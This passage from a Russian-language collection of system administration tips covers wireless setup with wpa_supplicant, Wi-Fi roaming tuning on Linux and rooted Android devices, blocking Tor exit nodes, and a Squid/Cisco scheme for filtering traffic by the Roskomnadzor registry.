соединиться к провайдеру из консоли $ sudo openvpn /etc/openvpn/raduga.conf Если успешно соединились с сервером, закрываем соединение нажатием "ctrl+c". Перезапускаем даемон $ sudo /etc/init.d/openvpn restart

Настройка беспроводного соединения в Linux с использованием LEAP, WPA или WPA2 (доп. ссылка 1) (доп. ссылка 2) [комментарии]

Примеры настройки LEAP, WPA или WPA2 в Linux при помощи wpa_supplicant (http://hostap.epitest.fi/wpa_supplicant/) В Debian пакет wpasupplicant, также имеются пакеты с GUI интерфейсом - kwlan и wpagui. WPA --- Создаем файл конфигурации, например /etc/wpa_supplicant.conf ctrl_interface=/var/run/wpa_supplicant ctrl_interface_group=0 eapol_version=1 # ap_scan=2 was the one for me you may try 0 or 1 indstead of 2 ap_scan=2 fast_reauth=1 network={ ssid="SSID сети" proto=WPA key_mgmt=WPA-PSK pairwise=TKIP group=TKIP psk="пароль доступа" } WPA2-Personal ------------- Файл конфигурации: ctrl_interface=/var/run/wpa_supplicant ctrl_interface_group=0 ap_scan=1 network={ ssid="SSID сети" proto=RSN key_mgmt=WPA-PSK pairwise=CCMP TKIP group=CCMP TKIP psk="пароль доступа" } LEAP ---- Файл конфигурации: ctrl_interface=/var/run/wpa_supplicant ctrl_interface_group=0 eapol_version=1 ap_scan=1 fast_reauth=1 network={ scan_ssid=1 mode=0 ssid="SSID сети" proto=WPA key_mgmt=WPA-EAP pairwise=TKIP group=TKIP eap=LEAP priority=2 auth_alg=LEAP eapol_flags=0 identity="идентификатор пользователя" password="Пароль достутпа" } "SSID сети", "идентификатор пользователя" и "пароль достутпа" заменяем на полученные от администратора сети данными. Далее поднимаем wifi интерфейс (Intel Pro Wireless 3945ABG/BG): ifconfig wlan0 down iwconfig wlan0 essid "имя сети" ifconfig wlan0 up Запускаем wpa_supplicant: wpa_supplicant -iwlan0 -c /etc/wpa_supplicant.conf -Dwext -dd Для драйвера ipw2200, интерфейс будет eth1: wpa_supplicant -d -c /etc/wpa_supplicant.conf -ieth1 -Dwext -dd Для madwifi - ath0: wpa_supplicant -d -c /etc/wpa_supplicant.conf -iath0 -Dmadwifi -dd Посмотреть состояние соедиения можно через wpa_cli или GUI интерфейс wpa_gui. Для получения IP адреса по DHCP нужно запустить DHCP-клиент: dhcpcd wlan0 Для настройки соединение двух машин в Ad-Hoc режиме можно использовать примерно такую комбинацию: modprobe ipw3945 iwconfig eth1 mode Ad-Hoc iwconfig eth1 essid "testnet" iwconfig eth1 key restricted iwconfig eth1 channel 1 ifconfig eth1 192.168.1.1 up iwconfig eth1 key s:12345 где, testnet имя сети, а 12345 пароль.

Настройка работы беспроводной карты на базе Broadcom BCM43xx в Ubuntu (доп. ссылка 1) Автор: E@zyVG [комментарии]

После установки Ubuntu 8.04 по умолчанию не работают беспроводные карты на базе чипов Broadcom BCM43xx из-за отсутствия firmware. Начиная с Linux ядра 2.6.24 работу данных карт в Linux обеспечивает драйвер b43, в более ранних версиях использовался драйвер bcm43xx. Для включения работы карты нужно установить пакет b43-fwcutter и получить firmware: sudo apt-get install b43-fwcutter и активировать на ноутбуке адаптер. Также можно воспользоваться меню Menu / System / Administration / Hardware Drivers. Драйвером b43 поддерживаются чипы: * bcm4303 (802.11b) * bcm4306 * bcm4309 (только 2.4GHz) * bcm4311 rev 1 / bcm4312 * bcm4311 rev 2 / bcm4312 (с 2.6.24 ядром работает через доп. патчи) * bcm4318 В настоящее время нет поддержки: * 802.11a для серий 4309 и 4312; * BCM 4328/4329 * не реализованы возможности представленные в проекте стандарта 802.11n; Сайт разработчиков драйвера: http://wireless.kernel.org/en/users/Drivers/b43

Обеспечение работы беспроводной карты в Ubuntu 7.10 через ndiswrappe (доп. ссылка 1) Автор: silverghost [комментарии]

1. Устанавливаем ndiswrapper: sudo apt-get install ndiswrapper-common ndiswrapper-utils-1.9 2. Распаковываем куда нибудь Windows драйверы и пишем из под пользователя root такие команды: ndiswrapper -i bcmwl5.inf modprobe ndiswrapper echo "blacklist bcm43xx" >> /etc/modprobe.d/blacklist echo "ndiswrapper" >> /etc/modules 3. Перегружаемся и проверяем. Все должно работать.

Настройка Linux как Wifi шлюза для КПК (доп. ссылка 1) Автор: Михаил Конник [комментарии]

Linux шлюз: Нужно создать простую одноранговую ad-hoc сеть и дать статический IP-адрес сетевому беспроводному интерфейсу. После этого делаем NAT и всё работает. Для беспроводного интерфейса eth3 и сети с идентификатором virens команда выглядит так (от рута): # iwconfig eth3 mode Ad-Hoc channel 1 essid virens В /etc/network/interfaces пишем что-то вроде: auto eth3 iface eth3 inet static address 10.106.146.1 netmask 255.255.255.0 wireless-mode ad-hoc wireless-channel 1 wireless-rate auto wireless-essid virens Теперь делаем NAT: # echo 1 > /proc/sys/net/ipv4/ip_forward # iptables -t nat -A POSTROUTING --out-interface eth1 -j MASQUERADE При этом eth1 это интерфейс, который подключён к Интернету. Соединение не шифруется. КПК: Необходимо задать essid - такой же, какой дали в iwconfig. Шифрование отсутствует, тип сети - одноранговая ad-hoc. Снимаем галку "Получать IP-адрес автоматически" и вводим адреса: IP-адрес: 10.106.146.2 Маска подсети: 255.255.255.0 Маршрутизатор: 10.106.146.1

Подключение к беспроводной сети под Linux (доп. ссылка 1) [комментарии]

0. Убеждаемся, что наш беспроводной адаптер в списке поддерживаемых в Linux (http://www.linux-wlan.org/docs/wlan_adapters.html.gz) на сайте http://www.linux-wlan.org/ 1. Подгружаем модуль ядра: insmod prism2_usb 2. Активируем wlan0 wlanctl-ng wlan0 lnxreq_ifstate ifstate=enable 3. Устанавливаем SSID для используемой сети wlanctl-ng wlan0 lnxreq_autojoin ssid=stayoutofmynet authtype=opensystem 4. Выставляем атрибуты WEP wlanctl-ng wlan0 lnxreq_hostwep encrypt=true decrypt=true wlanctl-ng wlan0 dot11req_mibset mibattribute=dot11PrivacyInvoked=true 5. Используем WEP ключ wlanctl-ng wlan0 dot11req_mibset mibattribute=dot11WEPDefaultKeyID=3 wlanctl-ng wlan0 dot11req_mibset mibattribute=dot11WEPDefaultKey3=12:34:56:78:9A 6. Конфигурируем IP ifconfig wlan0 192.168.1.100 netmask 255.255.255.0 broadcast 192.168.1.255 route add default gw 192.168.1.11

Настройка беспроводной 80211 карты под FreeBSD (доп. ссылка 1) Автор: toxa [комментарии]

kldload bridge sysctl net.link.ether.bridge.enable="1" sysctl net.link.ether.bridge.config="wi0,fxp0" sysctl net.inet.ip.forwarding="1" ifconfig wi0 ssid toxawlan channel 11 media DS/11Mbps mediaopt hostap up stationname "toxawlan"

Бесшовная миграция (роуминг) Wi-Fi для клиентов Linux и Android (доп. ссылка 1) (доп. ссылка 2) Автор: sfstudio [комментарии]

С wpa_supplicant из GIT теперь можно настроить в Linux прозрачную миграцию, позволяющую переключиться на другую точку доступа без разрыва соединений приложений, в том числе продолжается вещание мультикастовоего IPTV, а выполнение iperf в большинстве случаев не умирает, а лишь деградирует по скорости в момент миграции. При этом даже корректно отрабатывает вариант с несколькими AP в разных поддиапазонах 5ГГц. Для настройки роуминга потребуется (на примере Mageia Linux 5): 1) wpa_supplicant из git. Можно взять подготовленный автором src.rpm wget http://wive-ng.sf.net/downloads/wpa_supplicant-2.6-1.mga5.src.rpm и собрать командой rpmbuild --rebuild wpa_supplicant-2.6-1.mga5.src.rpm 2) переключить его на использование nl80211 вместо wext, драйвер вашего wifi-модуля должен полностью поддерживать nl80211 (при использовании wext всегда будут долгие периоды реконнекта с потерей соединений пользовательских приложений) так как требуется, чтобы SME был на уровне wpa_supplicant. Большинство дистрибутивов по умолчанию использует WEXT, т.е. до сих пор далеко не все драйверы wifi, даже входящие в состав ядра, умеют nl80211 (iwlwifi точно умеют, ath*k тоже должны, в rt28xxx по факту даже сканирование не работает). Проверить, что используется на данный момент, можно, посмотрев, с какими опциями запущен supplicant ps ax | grep wpa_supplicant должен выдать что-то типа 25201 ? Ss 0:01 /usr/sbin/wpa_supplicant -B -i wlan0 -c /etc/wpa_supplicant.conf -D nl80211 -f /var/log/wpa_supplicant.log Для этого редактируем /etc/sysconfig/network-scripts/ifcfg-имя_интерфейса Важно установить: WIRELESS_WPA_DRIVER=nl80211 WIRELESS_WPA_REASSOCIATE=no MII_NOT_SUPPORTED=yes USERCTL=yes В /etc/wpa_supplicant.conf везде отключаем рандомизацию MAC. Включаем фоновое сканирование: bgscan="simple:30:-60:200" Т.е. при уровне ниже -60 будем начинать время от времени "щупать эфир" на предмет наличия кандидатов для миграции и по возможности мигрировать. Вместо фонового сканирования можно было бы использовать данные из RRM, но этой логики в wpa_supplicant пока нет. Также следует обратить внимание на используемый DHCP-клиент. Важно, чтобы он не сбрасывал адрес на интерфейсе (иначе сбросится состояние соединений приложений) по сигналу от ifplugd. Я использую штатный " "Internet Systems Consortium DHCP Client 4.3.3-P1". Ну и естественно, точки доступа и опорная сеть должны нормально отрабатывать ситуацию с перемещением клиентов. В прошивке Wive-NG для этого сделано абсолютно всё, что возможно. Больше ничего не требуется. Проверено на адаптерах Intel I3160/I7260. Выпинывать их принудительно не надо - оно само инициирует переход без всяких проблем. Под Windows эти карты ведут себя аналогично, т.е. без проблем мигрируют с сохранением пользовательских соединений, достаточно лишь в настройках драйвера увеличить агрессивность роуминга. Настройка миграции Android-устройств с беспроводными чипами от Atheros/Qualcomm. Достаточно давно atheros/qualcomm добавили в свои драйверы вполне внятную логику handover (миграции внутри плоской L2 сети, с точки зрения клиента, с множественными AP, на которых установлен один SSID). Собственно, тот самый роуминг, да ещё и бесшовный (ну если используемые AP не совсем плохи и умеют моментально передавать в опорную сеть критичные данные, например, ARP-ы для обновления ARP-таблиц на устройствах в сети + ещё ряд условий на тему кривости). Теперь о проблеме. Handover есть, сеть с нормальными AP есть, но чтобы клиент мигрировал, по-прежнему требуется пинок, иначе висит до последнего... Что делать и кто виноват? Для продолжения нужно само устройство, обязательно рутованное, обязательно использующее радио на чипе qualcomm (например yota phone 2). Перемонтируем разделы в RW, идём в /system/etc/wifi, видим там файл WCNSS_qcom_cfg.ini - собственно, это основной конфигурационный файл, читаемый драйвером wifi. Драйверы QCA сами реализуют слои SME/MLME, не экспортируя эти функции на плечи wpa_supplicant. И вся логика управления подключениями и миграцией возложена на них. Wpa_supplicant в Android собран с NO_ROAMING, а значит можно ожидать, что это сделано так же у всех абсолютно чипмэйкеров для Android (файлы конфигурации, естественно, разные, или же, как у Broadcom, интересующие нас параметры к исправлению задаются при компиляции, и изменить их на лету невозможно). Первая настройка, которая нас будет интересовать в файле конфигурации, это: # default value of this parameter is zero to enable dynamic threshold allocation # to set static roming threshold uncomment below parameter and set vaule gNeighborLookupThreshold=78 Эта настройка напрямую отвечает за то, когда клиент начнёт пытаться искать кандидата (форсирует сканирование, или запросит список ближайших AP по RRM и проведёт короткую процедуру скана для подтверждения). И значение у нас выставлено -78дБ... И вроде бы всё хорошо, но... Мы как обычно забыли, что то, что слышит клиент и то, что слышит AP, может отличаться по уровню на десятки дБ. Обычно в android-клиентах передатчик в 20МГц полосе может выдать 16дБм, в 40МГц в лучшем случае 14дБм. Тогда как со стороны AP обычно имеем как минимум 20дБм дури даже в 40МГц полосе (обычно определяется законодательными ограничениями конкретной страны, для РФ 20дБм в 2.4ГГц и 23дБм в 5ГГц независимо от ширины, хоть в 80МГц эти 23дБм, хоть в 20МГц). Из опыта, при таком раскладе в среднем перекос по уровням в прямой видимости уже в 10 метрах будет составлять около 10-15 Дб, а если есть преграды, то запросто перевалит и за 30 Дб. Но возьмём 10дБ для простоты. Т.е. когда клиент видит AP с уровнем в -78дБ, AP видит клиента уже с уровнем около -88дБ. Стоит говорить, что нормальной работы при таком раскладе уже не будет (особенно в 2.4ГГц в зашумленном эфире офиса)? TCP, требующий подтверждения доставки, просто встанет колом, голос начнёт квакать и т.д. Что бы этого избежать (плюс приземлить побольше клиентов, ведь для этого надо заставить всех работать на самой ближней AP, желательно с максимальными рэйтами и без повторов передачи), админ в сети наверняка на AP настроил handoff с уровнем эдак в -75дБ. Т.е. при -75дБ RSSI handoff со стороны AP застрелит такого клиента (при этом на клиенте уровень от AP будет аж -65дБ, т.е. далеко до заветных -78дБ, когда он решит подумать мигрировать). Т.е. будет link beat, сброс стэйтов и обрыв соединений на пользовательской стороне. Ещё пример - когда AP видит клиента с уровнем в -75дБ, клиент видит AP с уровнем -65дБ!! Или, когда на клиенте видим -78дБ, то со стороны AP клиент будет слышен лишь с уровнем -88дБ. Т.е. что бы обеспечить нормальный сервис, мы должны отстреливать клиента сильно раньше, чем он сам подумает мигрировать (имеется в виду, с вышеозначенными умолчаниями в драйвере). Или же нам придётся снижать мощность на AP что бы "уравнять" шансы, что в условиях грязного эфира может привести к катастрофическому падению SNR и как следствие бульканью, хрипам и прочему. А вот чтобы этого не происходило, достаточно выше обозначенную переменную поправить, выставив значение в диапазоне -65 ~ -70дБ. Побочный эффект - чуть упадёт скорость у клиента, так как чаще будет выполняться фоновые сканирования, плюс незначительно вырастет энергопотребление. Зато у него "будет повод" начать смотреть, кто есть вокруг, и попытаться мигрировать, не дожидаясь, пока его выпнет точка доступа. Следующий блок: # CCX Support and fast transition CcxEnabled=0 FastTransitionEnabled=1 CcxEnabled - это поддержка rrm ccx location-measurement, т.е. определения местоположения. Зачастую бесполезна и лишь будет расходовать аккумулятор. FastTransitionEnabled - поддержка 802.11R, однако в старых драйверах не полная, но хотя бы умеет учитывать MDIE при миграции (работает всегда, если переменная в значении 1). Заметим, что FT, а именно ускорение фазы аутентификации просто при взводе значения переменной в 1 работать не начнёт, так как требуется ещё пропатчить Supplicant и обвязку андроидную (как это делает, например, Samsung в своих топовых моделях). Однако, учёт MDIE - уже польза. Включаем. Не забываем также отключить 802.11d, иначе встретим много чудес в 5ГГц с DFS каналами. Пусть использование или не использование оных лежит на совести админа сети. # 802.11d support g11dSupportEnabled=0 Далее блок: # Legacy (non-CCX, non-802.11r) Fast Roaming Support # To enable, set FastRoamEnabled=1 # To disable, set FastRoamEnabled=0 FastRoamEnabled=1 Включает возможность миграции в любых сетях. Иначе, логика handover будет активироваться, только если клиент видит, что AP вещает поддержку 802.11R в IECAP. И/или используется WPA*-Enterprise. В новых драйверах, поставляемых в SDK для Android 6.0.1, добавлена ещё одна прекрасная опция: # Handoff Enable(1) Disable(0) gEnableHandoff=0 Эта опция (если выставить в 1) позволяет обрабатывать handoff с пинком со стороны AP как сигнал к миграции, т.е. банально не генерируется LinkBeat при kickout со стороны AP, а сразу выполняется попытка перескочить на следующую подходящую выбранную сканом AP, и только если не получилось сгенерировать Link Beat системе (т.е. о том, что его выпнули (kickout), знает только драйвер, и сразу пытается мигрировать, если не получается, то тогда уже сообщает системе, что всё, связи с этой сетью больше нет, надо выбрать другой SSID из тех, которые знает Android). Пользовательские соединения при этом останутся целыми (ну разве что iperf пострадает, но мессенджеры и голос останутся работать, правда в случае голоса будет квак). Это слегка нарушает "стандарт" 802.11, но в случае миграции очень полезная штука. После её включения, устройство прозрачно (с точки зрения запущенных приложений) сможет мигрировать даже в сетях, где весь роуминг построен исключительно на отстрелах клиента по уровню. А вот ещё одна крайне полезная настройка: #Check if the AP to which we are roaming is better than current AP in terms of RSSI. #Checking is disabled if set to Zero.Otherwise it will use this value as to how better #the RSSI of the new/roamable AP should be for roaming RoamRssiDiff=5 Дельта уровней между AP для выбора кандидата при миграции. Больше значение - меньше вероятность прилететь назад на ту же AP, но более отложенный старт миграции. Установленных по умолчанию 5дБ маловато. Нужно иметь дельту около 8-10дБ. Для начала выставим 8. RoamRssiDiff=8 Ещё интересная штука: #Beacon Early Termination (1 = enable the BET feature, 0 = disable) enableBeaconEarlyTermination=1 beaconEarlyTerminationWakeInterval=11 Эта опция откидывает все маяки, если в этих фрэймах не взведён бит TIM, а клиент спит. Т.е. во сне клиент не может вести пассивный сбор данных о соседних AP. Хорошо для аккумулятора - вероятно, плохо для миграции (надо глубже копать драйвер). gActiveMaxChannelTime=60 gActiveMinChannelTime=30 gActiveMaxChannelTimeConc=60 gActiveMinChannelTimeConc=30 Настройки времени прослушивания эфира при активном сканировании поканально, в мс. Больше значения - больше времени уйдёт на сканирование всего диапазона. Меньше время - быстрее просканируем, но можем половину не услышать. RRM включается так: # 802.11K support gRrmEnable=1 gRrmOperChanMax=8 gRrmNonOperChanMax=8 gRrmRandIntvl=100 Правда, я на доступных мне железках (в смысле, на тех, в которых было выключено и включил, на SGS A5 2017 запросы есть, но там и так всё с миграцией более-менее) так и не дождался ни одного запроса с использованием RRM от Yota Phone. Видимо, отключена поддержка при сборке драйвера. Это основное, что касается миграции. Да и ещё: # 1: Enable standby, 2: Enable Deep sleep, 3: Enable Mcast/Bcast Filter gEnableSuspend=3 По умолчанию обычно 0. В таком режиме клиент при переходе в режим сна (часто просто при выключении экрана) полностью тушит RF часть, временно просыпаясь только для того, чтобы AP его по таймауту не выпнула. При этом, реализация такова, что и роумингу зачастую становится плохо. Следует установить его в 3, т.е. фильтровать броадкасты и мультикасты во сне, и только. В файле конфигурации ещё много интересных параметов. Например, куча настроек для энергосбережения, если поотключать которые, миграция становиться более весёлой и точной, но батарея... Ну и на закуску: #Channel Bonding gChannelBondingMode24GHz=1 gChannelBondingMode5GHz=1 gShortGI20Mhz=1 gShortGI40Mhz=1 Поддержка широких каналов (>20МГц) + поддержка SGI. Зачастую для 2.4ГГц поддержка 40МГц отключена, т.е. gChannelBondingMode24GHz установлен в 0. Что, во-первых, не позволяет работать на максимальных рэйтах (150Мбит/с для 1T1R в 2.4ГГц при 40МГц, будет только 72). Увы, проблема в том, что видимо для первого соединения значение перекрывается откуда-то ещё, и даже выставив gChannelBondingMode24GHz=1, сразу мы 150Мбит/с не видит. Но после первой же миграции драйвер плюёт на всех и взлетает в 40МГц полосе. Также установка gChannelBondingMode24GHz решает проблему совместимости с некоторыми 2.4ГГц AP на Xiaomi и One+ (как обычно, намутили с анонсами в зависимости от региона, в итоге AP и клиент не могут договориться, в какой полосе разговаривать). Не забываем после правки сохранить, перемонтировать назад системный раздел в RO и перезагрузиться.

Ограничение трафика

Как заблокировать вход пользователей, работающих через сеть Tor [комментарии]

Список точек выхода сети Tor, с которых инициируются исходящие соединения, можно загрузить на официальном сайте проекта Tor: https://check.torproject.org/cgi-bin/TorBulkExitList.py или используя неофициальные архивы: http://torstatus.info/ip_list_all.php/Tor_ip_list_ALL.csv https://www.dan.me.uk/torlist/ По указанным адресам выдаются списки IP-адресов, которые можно использовать для блокирования межсетевым экраном/HTTP-сервером или привязки метки через модуль geo_ip. Пример блокирования через ipfw: ipfw table 1 flush curl https://check.torproject.org/cgi-bin/TorBulkExitList.py?ip=8.8.8.8 | grep -v "^#" | while read cnt ip; do /sbin/ipfw table 1 add $ip 1 done ipfw add deny all from "table(1)" to any via em1 Для выставления флага через модуль ngx_http_geo_module в nginx: curl https://check.torproject.org/cgi-bin/TorBulkExitList.py?ip=8.8.8.8 | grep -v "^#" | sed 's/$/ tor;/' > /usr/local/etc/nginx/tor.conf в nginx.conf: geo $country { include /usr/local/etc/nginx/tor.conf } далее для блокировки можно добавить проверку: if ($country = 'tor') { ... }

Построение системы фильтрации контента по реестру Роскомнадзора на базе CISCO и FreeBSD (доп. ссылка 1) Автор: Пережилин Юрий [комментарии]

В статье подробно рассмотрен один из вариантов фильтрации трафика по реестру Роскомнадзора с помощью SQUID на базе FreeBSD, состыкованного с бекбоне CISCO по протоколу WCCP2. После долгих размышлений на тему фильтрации, производительности (если пустить в фильтр весь http-трафик, то фильтрация должна осуществляться на скоростях более гигабита в секунду), была выбрана следующая схема: Трафик HTTP и HTTPS, выходящий из облака нашей сети (в примере VLAN90) через наш бордер CISCO, мы будем сравнивать с ACL, содержащим IP-адреса, извлеченные из списка Роскомнадзора. В случае совпадения, мы отправляем трафик по протоколу WCCP (Web Cache Communication Protocol) на сервер(а) SQUID. Данная схема позволит нам избежать анализа всего трафика и анализировать только тот, который идет на заявленные IP, что не может не сказаться положительно на общей производительности системы. Из минусов данной связки следует, что допустим если внесенный в реестр ресурс с IP=3.3.3.3, доменом=bad.xxx и URL=http://www.bad.xxx/1.jpg переезжает на другой IP, то фильтр работать не будет. Но с другой стороны актуализация списков блокировки, это не наша проблема. Данный подход позволит нам с одной стороны не тратится на дорогостоящие системы анализа проходящего трафика, с другой стороны исключить "пионерский" подход блокировки всего ресурса по IP, а блокировать только указанный в реестре Роскомнадзора контент. Связку по WCCP лучше поднимать на приватных адресах, что бы не писать лишние ACL в SQUID . И так, приступим к реализации. Для начала нам надо вытащить электронную подпись с рутокена, полученного в роскомнадзоре. Для этого воспользуемся утилитой P12FromGostCSP, и экспортируем подпись в формате PKSC#12. Если экспорт удался, то можем перейти далее к построению системы. Если экспорт не удался (у меня в одном случае из четырех было именно так), то автоматическая загрузка реестра Роскомнадзора будет не доступна, и Вам придется файл качать и выкладывать реестр руками. Берем любой сервер на базе FreeBSD (я предпочитаю данную ОС, но ничего не мешает Вам сделать по образу и подобию на любой *NIX машине), на котором мы будем заниматься загрузкой базы Роскомнадзора, ее обработкой и у меня этот же сервер как правило обеспечивает анализ и фильтрацию контента. Так как системный OpenSSL в FreeBSD не поддерживает шифрование ГОСТ, ставим свежую версию из портов. Это не затрагивает работоспособность всей системы, и портовый OpenSSL прекрасно существует параллельно системному: # which openssl /usr/bin/openssl # openssl version OpenSSL 0.9.8y 5 Feb 2013 # /usr/local/bin/openssl version OpenSSL 1.0.1e 11 Feb 2013 # Находим файл /usr/local/openssl/openssl.cnf и пишем в конец файла: [openssl_def] engines = engine_section [engine_section] gost = gost_section [gost_section] default_algorithms = ALL engine_id = gost #dynamic_path = /usr/local/lib/engines/libgost.so CRYPT_PARAMS = id-Gost28147-89-CryptoPro-A-ParamSet В начало этого файла пишем : openssl_conf = openssl_def Копируем на сервер наш сертификат в формате PKSC#12 и конвертируем его в формат PEM: /usr/local/bin/openssl pkcs12 -in p12.pfx -out cert.pem -nodes -clcerts Подготавливаем структуру директорий для работы наших скриптов и копируем туда сконвертированный сертификат: mkdir /var/db/zapret-info/ mkdir /var/db/zapret-info/cfg mkdir /var/db/zapret-info/arch cp cert.pem /var/db/zapret-info/cfg/ mkdir /tftpboot Создаем файл запрос в соответствии с требованиями Роскомнадзора (где данные между тэгами изменены на данные вашей фирмы): echo '<operatorName>ООО "РОГА И КОПЫТА"</<operatorName>' > /var/db/zapret-info/cfg/request.xml echo '<inn>00XXXXXXXXXX</inn>' >> /var/db/zapret-info/cfg/request.xml echo '<ogrn>XXXXXXXXXXXXX</ogrn>' >> /var/db/zapret-info/cfg/request.xml echo '<email>info@rogaikopita.ru</email>' >> /var/db/zapret-info/cfg/request.xml В зависимости от раскладок системной консоли полученный файл /var/db/zapret-info/cfg/request.xml необходимо сконвертировать в кодировку WINDOWS-1251. Скачиваем нижеприложенные скрипты. Скрипт download.pl был найден мной на просторах Интернета и упрощен, в оригинале он был чуток более замороченный. Задача данного скрипта - создать, подписать и отправить запрос в Роскомнадзор и загрузить реестр после отправки. #!/usr/bin/perl -w use strict; use SOAP::Lite; use MIME::Base64; use Sys::Syslog qw(:DEFAULT setlogsock); use POSIX qw(strftime); # XXX dirty!!! binmode STDOUT, ':utf8'; binmode STDERR, ':utf8'; my $BASE = "/var/db/zapret-info"; my %n; ($n{sec},$n{min},$n{hour},$n{mday},$n{mon},$n{year},$n{wday},$n{yday}, $n{isdst}) = localtime(time()); $n{year}+=1900; $n{mon}++; $n{mon}=~s/^(\\d)$/0$1/; $n{mday}=~s/^(\\d)$/0$1/; $n{hour}=~s/^(\\d)$/0$1/; $n{min}=~s/^(\\d)$/0$1/; $n{sec}=~s/^(\\d)$/0$1/; my $dt="$n{year}-$n{mon}-$n{mday}T$n{hour}:$n{min}:$n{sec}.000+04:00"; my $dd="$n{year}$n{mon}$n{mday}$n{hour}"; my $service = SOAP::Lite->service("http://www.zapret-info.gov.ru/services/OperatorRequest?wsdl"); my $reqfn = "$BASE/request-$dd.xml"; my $binfn = "$BASE/request-$dd.bin"; my $xmlreqfn = "$BASE/cfg/request.xml"; my $certfn = "$BASE/cfg/cert.pem"; my $request="" ; open (XML, "<$xmlreqfn"); while (<XML>) { $request .= $_; } close (XML); die "Resuest template not found in $xmlreqfn." if (length($request)==0); open (XMLREQ, ">$reqfn") or die "Can't create new request"; print XMLREQ "<?xml version=\\"1.0\\" encoding=\\"windows-1251\\"?>\\n"; print XMLREQ "<request>\\n\\t<requestTime>$dt</requestTime>\\n"; print XMLREQ $request; print XMLREQ "</request>"; close XMLREQ; system ("/usr/local/bin/openssl smime -sign -in $reqfn -out $binfn". " -signer $certfn -outform DER -nodetach"); open XMLREQ, "<$reqfn" or die "Can't open $reqfn"; my $xmlreq = do { local $/ = undef; <XMLREQ>; }; close XMLREQ; open XMLREQSIG, "<$binfn" or die "Can't open $binfn"; my $xmlreqsig = do { local $/ = undef; <XMLREQSIG>; }; close XMLREQSIG; my @sendresult = $service->sendRequest( $xmlreq, $xmlreqsig ); if ($sendresult[0] eq 'false') { mylog("error request $sendresult[1]"); } elsif ($sendresult[0] eq 'true') { open (CODESTRING, ">$BASE/codestring"); print CODESTRING $sendresult[2]; close CODESTRING; mylog("sent request $binfn: $sendresult[1]"); }; if (-e "$BASE/codestring") { open CODESTRING, "$BASE/codestring"; my $codestring = <CODESTRING>; close CODESTRING; my $cnt = 0; while(1) { my @getresult = $service->getResult($codestring); if ($getresult[0] eq 'false') { mylog ("$getresult[1]"); sleep 60; } elsif ($getresult[0] eq 'true') { my $outarch = decode_base64($getresult[1]); open (OUT, ">$BASE/out.zip"); print OUT $outarch; close OUT; unlink "$BASE/codestring"; if (-e "$BASE/out.zip") { system("/bin/mv $reqfn $BASE/arch/"); system("/bin/mv $binfn $BASE/arch/"); system("/bin/cp $BASE/out.zip $BASE/arch/out-$dt.zip"); system("/usr/bin/unzip -o $BASE/out.zip -d $BASE/dump"); unlink "$BASE/out.zip"; mylog ("Done. Everything seems to be ok."); exit 0; }; mylog("Shouldn't reach. DEBUG ME!!!"); exit 255; } else { mylog ("getresult is unknown"); exit 255; }; $cnt++; if ($cnt>30) { mylog ("too much tries, bailing out"); exit 255; } }; # notreached } else { mylog ("codestring file not found"); }; sub mylog { my $logstring = $_[0]; my($now_string); $now_string = strftime "%d-%m-%Y %H:%M:%S", localtime; print(STDERR $now_string." ".$logstring."\\n"); }; В задачи скрипта xml-paser.pl входит обработка полученного реестра и подготовка двух файлов - block.acl и denied.conf. Файл block.acl содержит правила для нашей cisco и как правило загружается по tftp. Файл denied.conf содержит URL для редиректора SQUID. Скрипт анализирует, префикс http или https указан в URL и в соотвествии с данным префиксом генерирует ACL для CISCO. Для ресурсов с множественныйми IP и/или URL, скрипт генерирует два ACL - как по порту www, так и по порту 443 (так как реестр сам по себе сырой, и такие записи не предусматривают однозначной трактовки какой протокол на каком IP использовать). #!/usr/bin/perl use XML::Simple; use Data::Dumper ; use Encode ; use URI::Escape; use Text::Iconv; $db_path='/var/db/zapret-info/' ; $tftp_root='/tftpboot' ; $query_ip='XXX.XXX.XXX.XXX' ; $simple=XML::Simple->new( KeepRoot=>1, RootName=>'reg:register' ); $xml=$simple->XMLin($db_path.'dump/dump.xml'); my %list = %{$xml->{'reg:register'}->{'content'}}; open(FURL, ">${db_path}denied.conf"); open(FACL, ">${tftp_root}/block.acl"); open(FTMP, ">/tmp/block.ip"); print(FACL "no ip access-list extended WCCP_REDIRECT\\n"); print(FACL "ip access-list extended WCCP_REDIRECT\\n"); print(FACL "deny tcp host ${query_ip} any\\n"); sub _url { eval { $url=shift; $url=~s/ //g; $url=uri_escape_utf8($url, "^A-Za-z0-9\\-\\._~:/\\?\\=\\&\\%"); print(FURL $url."\\n"); } } while ( my($key, $value) = each %list) { my $domain=$value->{'domain'} ; my $ip=$value->{'ip'} ; my $url=$value->{'url'} ; if(ref($ip) eq 'ARRAY'){ my @ip_list=@{$ip}; foreach $ip (@ip_list) { print(FTMP "$ip eq $port\\n"); print(FTMP "$ip eq 443\\n"); } } else { my $proto=substr($url, 0, 5) ; if ("\\L$proto" eq 'https') { $port = '443'; } else { $port = 'www'; } print(FTMP "$ip eq $port\\n"); } if(ref($url) eq 'ARRAY'){ my @url_list=@{$url}; foreach $url (@url_list) { _url($url); } } else { _url($url); } } close(FTMP); open(FTMP ,"sort -u /tmp/block.ip|"); while (<FTMP>) { $ip=$_; $ip=~s/ //g; print(FACL "permit tcp any host $ip \\n"); } close(FTMP); print(FACL "deny ip any any\\n"); print(FACL "!\\n"); print(FACL "end\\n"); close(FACL); close(FURL); open(SER ,"${db_path}/serial"); read(SER,$serial,6); close(SER); if (length($serial)==0) { $serial=0; } $serial+=1; open(SER ,">${db_path}/serial"); printf(SER "%06d",$serial); close(SER); exit 0; В начале данного файла надо установить значение переменных, в соответсвии с Вашими настройками. Переменная $tftp_root должна быть установлена в соответствии с настройками Вашего tftp-сервера, переменная $query_ip должна содержать IP-адрес интерфейса сервера, через который посылается в Интернет фильтрованный трафик, для исключения образования кольцевой обработки запросов. Для работы скриптов нам требуется установить следующие порты : cd /usr/ports/net/p5-SOAP-Lite; make install cd /usr/ports/converters/p5-MIME-Base64; make install cd /usr/ports/sysutils/p5-Sys-Syslog; make install cd /usr/ports/textproc/p5-XML-Simple; make install cd /usr/ports/devel/p5-Data-Dumper; make install cd /usr/ports/converters/p5-Encode; make install cd /usr/ports/net/p5-URI; make install cd /usr/ports/converters/p5-Text-Iconv; make install На данном этапе мы реализовали получение и разбор реестра Роскомнадзора в требуемый для нас вид. Переходим к настройке нашего железа. Конфигурируем CISCO для работы с сервером SQUID по WCCP. Группа 0 используется для отсылки http-трафика, группа 70 - для отсылки https-трафика. ip wccp 0 redirect-list WCCP_REDIRECT group-list 10 accelerated ip wccp 70 redirect-list WCCP_REDIRECT group-list 10 accelerated access-list 10 remark +++ 